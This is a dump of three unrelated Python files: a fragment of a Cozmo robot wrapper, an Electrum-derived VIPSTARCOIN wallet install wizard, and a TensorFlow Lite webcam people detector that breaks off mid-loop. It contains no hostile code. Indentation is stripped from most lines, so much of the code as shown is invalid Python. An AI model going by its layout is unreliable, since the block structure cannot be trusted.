# print("[Bot] placeCubeOnCube() finished")
# return res.state == cozmo.action.ACTION_SUCCEEDED
def gotoOrigin(self):
res = self._robot.go_to_pose(self._origin)
return True
def say(self, text):
print("[Bot] Executing Say: " + text)
# res = self._robot.say_text(text).wait_for_completed()
# print("[Bot] Say finished")
# return res.state == cozmo.action.ACTION_SUCCEEDED
return False
def enableFreeWill(self, enable):
print("[Bot] Executing enableFreeWill(" + str(enable) + ")")
if enable:
self._robot.start_freeplay_behaviors()
else:
self._robot.stop_freeplay_behaviors()
def stop(self):
print("[Bot] Executing stop")
self._robot.stop_all_motors()
def delay(self, seconds):
'''
seconds - can be float for fractions of a second
'''
# print("[Bot] Executing delay " + str(seconds))
time.sleep(seconds)
    def turn(self, angle):
        # NOTE: still written against the old cozmo SDK action API
        # (wait_for_completed, cozmo.action.ACTION_SUCCEEDED); under pycozmo this
        # will fail until it is ported like the stubbed methods above.
        print("[Bot] Executing turn " + str(angle))
        res = self._robot.turn_in_place(Angle.degrees(angle)).wait_for_completed()
        print("[Bot] turn finished")
        return res.state == cozmo.action.ACTION_SUCCEEDED
def turnTowardCube(self, cube_num):
if not self.getCubeSeen(cube_num):
print("[Bot] Ignoring turnTowardCube() as the cube has not been observed yet")
return False
print("[Bot] Executing turn toward cube")
cube = self._robot.world.light_cubes[cube_num]
pos = self._robot.pose.position - cube.pose.position
angle = Angle.radians(math.atan2(pos.y, pos.x) - math.pi) - self._robot.pose.rotation.angle_z
res = self._robot.turn_in_place(angle).wait_for_completed()
print("[Bot] turn finished")
return res.state == cozmo.action.ACTION_SUCCEEDED
def driveDistanceWithSpeed(self, distance, speed):
print("[Bot] Executing driveDistanceSpeed(" + str(distance) + ", " + str(speed) + ")")
res = self._robot.drive_straight(Distance.mm(distance * 10), Speed.mmps(speed * 10))
print("[Bot] driveDistanceSpeed finished")
return True
def driveWheelsWithSpeed(self, lSpeed, rSpeed):
print("[Bot] Executing driveWheelsWithSpeed(" + str(lSpeed) + ", " + str(rSpeed) + ")")
self._robot.drive_wheels(lSpeed * 10, rSpeed * 10)
def driveTo(self, x, y):
print("[Bot] Executing driveTo(" + str(x) + ", " + str(y) + ")")
pose = Pose(x * 10, y * 10, 0, angle_z=self._robot.pose.rotation.angle_z)
res = self._robot.go_to_pose(self._origin.define_pose_relative_this(pose))
print("[Bot] driveTo finished")
return True
def waitForTap(self):
print("[Bot] Executing waitForTap()")
return self._robot.wait_for('ObjectTapped', timeout=None).obj
def addStaticObject(self, model, x1, y1, x2, y2, depth, height):
print("[Bot] Executing addStaticObject({},{},{},{},{},{})".format(x1, y1, x2, y2, depth, height))
data = {
'addStaticObject': {
'model': model,
'x1': x1,
'y1': y1,
'x2': x2,
'y2': y2,
'depth': depth,
'height': height
}
}
self._wsClient.send(json.dumps(data))
X1 = x1 * 10
Y1 = y1 * 10
X2 = x2 * 10
Y2 = y2 * 10
HEIGHT = height * 10
DEPTH = depth * 10
WIDTH = math.sqrt(math.pow(X1 - X2, 2) + math.pow(Y1 - Y2, 2))
centerX = (X1 + X2) / 2.0
centerY = (Y1 + Y2) / 2.0
centerZ = HEIGHT / 2.0
angle = math.atan2(Y1 - Y2, X1 - X2)
pose = Pose(centerX, centerY, centerZ, angle_z=Angle.radians(angle))
self._robot.world.create_custom_fixed_object(self._origin.define_pose_relative_this(pose), WIDTH, DEPTH, HEIGHT)
def setCubeModel(self, model, num):
data = {
'setCubeModel': {
'model': model,
'cubeNum': num
}
}
self._wsClient.send(json.dumps(data))
def highlight(self, block):
data = {
'highlight': block
}
self._wsClient.send(json.dumps(data))
|
installwizard.py
|
import sys
import threading
import os
import traceback
from typing import Tuple, List
from PyQt5.QtCore import *
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from electrum.plugin import run_hook
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n' \
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n' \
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> QDckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> MNhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> qc1q3fjfk...')
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
        for i in range(self.n):
            # QPainter.drawPie expects angles in 1/16ths of a degree, hence the 16 * 360 factor
            alpha = int(16 * 360 * i / self.n)
            alpha2 = int(16 * 360 * 1 / self.n)
            qp.setBrush(Qt.green if i < self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
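# Contract of @wizard_dialog (summarising the wrapper above): the decorated
# method must accept a `run_next` keyword argument; whatever it returns is
# wrapped into a tuple if needed and forwarded to run_next(*out), while GoBack
# and UserCancelled unwind the wizard instead of advancing it.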
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('VIPSTARCOIN Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
        # Set for the base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
self.temp_storage = WalletStorage(path)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, self.temp_storage if self.temp_storage.file_exists() else None
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename)).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
title = _('Enter Seed')
options = []
if 'mobile' == self.wallet_type:
message = ''.join([
_('Please enter your seed phrase in order to restore your wallet. \n'),
_('This is compatible with vipstarcoin mobile wallet. \n')])
else:
if self.opt_ext:
options.append('ext')
# if self.opt_bip39:
# options.append('bip39')
message = ''.join([
_('Please enter your seed phrase in order to restore your wallet. \n')])
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
line.repaint()
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(5)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
# message = _("Electrum communicates with remote servers to get "
# "information about your transactions and addresses. The "
# "servers all fulfill the same purpose only differing in "
# "hardware. In most cases you simply want to let Electrum "
# "pick one at random. However if you prefer feel free to "
# "select a server manually.")
# choices = [_("Auto connect"), _("Select server manually")]
# title = _("How do you want to connect to a server? ")
# clayout = ChoicesLayout(message, choices)
# self.back_button.setText(_('Cancel'))
# self.exec_layout(clayout.layout(), title)
# r = clayout.selected_index()
# if r == 1:
# nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
# if self.exec_layout(nlayout.layout()):
# nlayout.accept()
# else:
# network.auto_connect = True
# self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
people_detector.py
|
######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 10/27/19
# Description:
# This program uses a TensorFlow Lite model to perform object detection on a live webcam
# feed. It draws boxes and scores around the objects of interest in each frame from the
# webcam. To improve FPS, the webcam object runs in a separate thread from the main program.
# This script will work with either a Picamera or regular USB webcam.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
import os
import argparse
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
from utils.data_tracker import *
from utils.mqtt_client import *
# Define VideoStream class to handle streaming of video from webcam in separate processing thread
# Source - Adrian Rosebrock, PyImageSearch: https://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
        ret = self.stream.set(3,resolution[0])   # 3 = cv2.CAP_PROP_FRAME_WIDTH
        ret = self.stream.set(4,resolution[1])   # 4 = cv2.CAP_PROP_FRAME_HEIGHT
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
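# Minimal usage sketch for VideoStream (mirrors how it is used further below):
#   videostream = VideoStream(resolution=(640, 480), framerate=30).start()
#   frame = videostream.read()   # most recent frame grabbed by the background thread
#   videostream.stop()           # releases the camera and ends the thread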
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution', help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
parser.add_argument('--record', help='Use a VideoWriter to record and save the output',
action='store_true') ### ADD RECORD ARGUMENT - JACOB HAGAN
parser.add_argument('--showdisplay', help='Displays output with cv2',
action='store_true') ### ADD DISPLAY ARGUMENT - JACOB HAGAN
parser.add_argument('--broker-ip', help='IP Address of the MQTT Broker. If no IP is specified, MQTT will not be used.',
default=None) ###ADDED BY COREY CLINE
parser.add_argument('--client_name', help='Name of the MQTT Client Session. Default session is TX1.',
default='TX1') ###ADDED BY COREY CLINE
parser.add_argument('--topic', help='MQTT topic to publish data to. Default topic is test/occupancy.',
default='test/occupancy')
parser.add_argument('--publish-interval', help='Interval in seconds to publish to MQTT topic. Default interval is 10s.',
default=10) ###ADDED BY COREY CLINE
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
use_VideoWriter = args.record ### INITIALIZE VIDEOWRITER FLAG - JACOB HAGAN
showdisplay = args.showdisplay ### INITIALIZE DISPLAY FLAG - JACOB HAGAN
broker_ip = args.broker_ip ###ADDED BY COREY CLINE
client_name = args.client_name ###ADDED BY COREY CLINE
mqtt_topic = args.topic ###ADDED BY COREY CLINE
publish_interval = int(args.publish_interval) ###ADDED BY COREY CLINE
# Validate MQTT input arguments here - COREY CLINE
if broker_ip is None:
if mqtt_topic != "test/occupancy":
raise Exception( "Must specify a broker_ip to publish to a topic. " + \
"Use --broker-ip argument to connect to a broker." )
if client_name != "TX1":
raise Exception( "Must specify a broker_ip for a client_name. "+ \
"Use --broker-ip argument to connect to a broker." )
if publish_interval != 10:
raise Exception( "Must specify a broker_ip to publish at a given " + \
"interval. Use --broker-ip argument to connect " + \
"to a broker." )
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if (GRAPH_NAME == 'detect.tflite'):
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,MODEL_NAME,LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del(labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
# If the user wants to record the output, initialize the VideoWriter object - JACOB HAGAN
if use_VideoWriter:
writer = cv2.VideoWriter( "output/output.avi", cv2.VideoWriter_fourcc( *"MJPG" ), 4, (imW,imH) ) ### ADDED HERE TO SAVE VIDEO AS FILE - COREY CLINE
# Initialize data tracker and MQTT Client - ADDED BY COREY CLINE
if broker_ip:
pub_timer = time.perf_counter() ### INITIALIZE PUBLISH TIMER - ADDED BY COREY CLINE
tracker = DataTracker()
TX1_client = MQTTClient( broker_ip, client_name )
TX1_client.connect()
#for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame = cv2.flip( frame, -1 ) ### ADDED HERE TO FLIP IMAGE FROM VIDEO STREAM - COREY CLINE
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'],input_data)
interpreter.invoke()
# Retrieve detection results
